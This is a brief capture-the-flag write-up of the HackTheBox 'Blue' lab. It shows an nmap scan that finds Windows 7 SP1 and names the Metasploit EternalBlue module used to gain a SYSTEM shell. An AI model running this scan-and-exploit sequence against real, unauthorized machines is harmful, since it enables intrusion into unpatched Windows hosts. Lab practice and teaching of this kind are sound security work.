Ziemni

Ziemni

Student, Pentester, CTF Player, HackTheBox Addict

[HackTheBox] Blue

This machine is more about teaching a single exploit rather than usual HTB process. It is still fun and enjoyable!

Summary

  • Enumerate machine’s OS.
  • Use EternalBlue exploit to get a shell as nt authority\system.

Recon

Port Scan

nmap -T4 -p- -sV -n 10.10.10.40

PORT      STATE SERVICE      REASON  VERSION
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack Microsoft Windows RPC

nmap also shows that this machine is running Windows 7 SP 1

...
OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
...

Exploit

Windows 7 SP 1 is vulnerable to a very popular and well-known exploit EternalBlue.

It can be easily exploited with Metasploit’s module windows/smb/ms17_010_eternalblue. It instantly gives you nt authority\system.

C:\Windows\system32>whoami
whoami
nt authority\system